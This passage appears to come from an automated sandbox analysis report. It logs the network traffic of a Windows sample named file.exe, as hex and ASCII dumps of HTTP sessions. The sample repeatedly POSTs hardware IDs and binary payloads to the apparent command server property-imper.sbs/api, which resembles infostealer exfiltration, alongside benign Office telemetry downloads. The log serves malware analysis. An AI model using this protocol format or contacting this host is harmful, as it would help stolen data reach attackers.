                                                                                                                                                                                              2024-11-24 12:39:09 UTC12823OUTData Raw: 2d 2d 32 4e 55 39 44 34 55 49 4a 4c 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 46 41 41 38 34 45 46 37 30 36 45 31 35 45 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 32 4e 55 39 44 34 55 49 4a 4c 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4e 55 39 44 34 55 49 4a 4c 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 32 4e 55 39 44 34 55 49 4a 4c 4b
                                                                                                                                                                                              Data Ascii: --2NU9D4UIJLKContent-Disposition: form-data; name="hwid"0DFAA84EF706E15ED7CBBD6DF28D3732--2NU9D4UIJLKContent-Disposition: form-data; name="pid"2--2NU9D4UIJLKContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--2NU9D4UIJLK
                                                                                                                                                                                              2024-11-24 12:39:10 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:10 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=v51a5k6tmn7mrkref617s8gnk4; expires=Thu, 20-Mar-2025 06:25:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U3%2FWIFdexA7NAGSttfzV7lpRxHqqoWbeB1suBhoiry593wj9qmF6K7pE4EYas6N79wio7cgRsuaHETSa%2B9OJSwieRO1sh0R8uyAoEXo%2BkZg%2FmwFr65Ulcq72cS20kIM5Dft0G6s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e7975cca89c0c74-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1470&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13758&delivery_rate=1913499&cwnd=84&unsent_bytes=0&cid=0a05e67d59479e7a&ts=1198&x=0"
                                                                                                                                                                                              2024-11-24 12:39:10 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                                              2024-11-24 12:39:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              4192.168.2.64971113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:11 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:11 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:11 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 218853
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public
                                                                                                                                                                                              Last-Modified: Sat, 23 Nov 2024 12:15:37 GMT
                                                                                                                                                                                              ETag: "0x8DD0BB889D4282C"
                                                                                                                                                                                              x-ms-request-id: c3062018-b01e-003e-79df-3d8e41000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123911Z-178bfbc474bbcwv4hC1NYCypys00000005qg00000000db9g
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:11 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                              2024-11-24 12:39:11 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                                                                                                                              Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                                                                                                                                                              2024-11-24 12:39:11 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                                                                                                                                                              Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                                                                                                                                                              2024-11-24 12:39:11 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                                                                                                                                                              Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                                                                                                                                                              2024-11-24 12:39:12 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                                                                                                                                                              Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                                                                                                                                                              2024-11-24 12:39:12 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                                                                                                                                                              Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                                                                                                                                                              2024-11-24 12:39:12 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                                                                                                                                                              Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                                                                                                                              2024-11-24 12:39:12 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                                                                                                                              2024-11-24 12:39:12 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                                                                                                                              2024-11-24 12:39:12 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                                                                                                                                                              Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              5192.168.2.649712104.21.33.1164435044C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:12 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=MJJC0YBHG1XZ8HYTQ9
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 15111
                                                                                                                                                                                              Host: property-imper.sbs
                                                                                                                                                                                              2024-11-24 12:39:12 UTC15111OUTData Raw: 2d 2d 4d 4a 4a 43 30 59 42 48 47 31 58 5a 38 48 59 54 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 46 41 41 38 34 45 46 37 30 36 45 31 35 45 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4d 4a 4a 43 30 59 42 48 47 31 58 5a 38 48 59 54 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 4a 4a 43 30 59 42 48 47 31 58 5a 38 48 59 54 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                              Data Ascii: --MJJC0YBHG1XZ8HYTQ9Content-Disposition: form-data; name="hwid"0DFAA84EF706E15ED7CBBD6DF28D3732--MJJC0YBHG1XZ8HYTQ9Content-Disposition: form-data; name="pid"2--MJJC0YBHG1XZ8HYTQ9Content-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                              2024-11-24 12:39:13 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:12 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=keql50gdfalhkhcaei6ku0ua4p; expires=Thu, 20-Mar-2025 06:25:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMD%2F7NlrTE29rMgFSOzAkKEsPaKqpVvPMKNBhswIHXxJVcWaRF59Lg%2Fd2Z88hP1RWQRVFQayX4D39QiQ7wG%2FJZKfFkc3v1wdaPlZF6tM6Zaej7m46YrCMGQuuPfE0W6r8V4rUUw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e7975dd99e00c80-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1539&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16053&delivery_rate=1864623&cwnd=240&unsent_bytes=0&cid=d5a86c8a6a93f2f3&ts=986&x=0"
                                                                                                                                                                                              2024-11-24 12:39:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                                              2024-11-24 12:39:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              6192.168.2.649718104.21.33.1164435044C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:14 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=A2ZA5O2D
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 19909
                                                                                                                                                                                              Host: property-imper.sbs
                                                                                                                                                                                              2024-11-24 12:39:14 UTC15331OUTData Raw: 2d 2d 41 32 5a 41 35 4f 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 46 41 41 38 34 45 46 37 30 36 45 31 35 45 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 41 32 5a 41 35 4f 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 32 5a 41 35 4f 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 41 32 5a 41 35 4f 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                              Data Ascii: --A2ZA5O2DContent-Disposition: form-data; name="hwid"0DFAA84EF706E15ED7CBBD6DF28D3732--A2ZA5O2DContent-Disposition: form-data; name="pid"3--A2ZA5O2DContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--A2ZA5O2DContent-Di
                                                                                                                                                                                              2024-11-24 12:39:14 UTC4578OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e 8d a5
                                                                                                                                                                                              Data Ascii: 2+?2+?o?Mp5p_oI
                                                                                                                                                                                              2024-11-24 12:39:15 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:15 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=f1dvp4foa6r7qi0s9ovr8maji5; expires=Thu, 20-Mar-2025 06:25:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kjDnpc9qlCfQaiItHZqgQ5T1Rlwc7LhlOdptXhF1h2tPNf%2FKZDVqLX9SbyWA1ANXb2evevr7vr0DVJO4dCAqeRVavI2L14880Rg4WLbv0pjbvXCfQuHUiuhFdnFdvoZUvskF1sc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e7975ecef5f8cd6-EWR
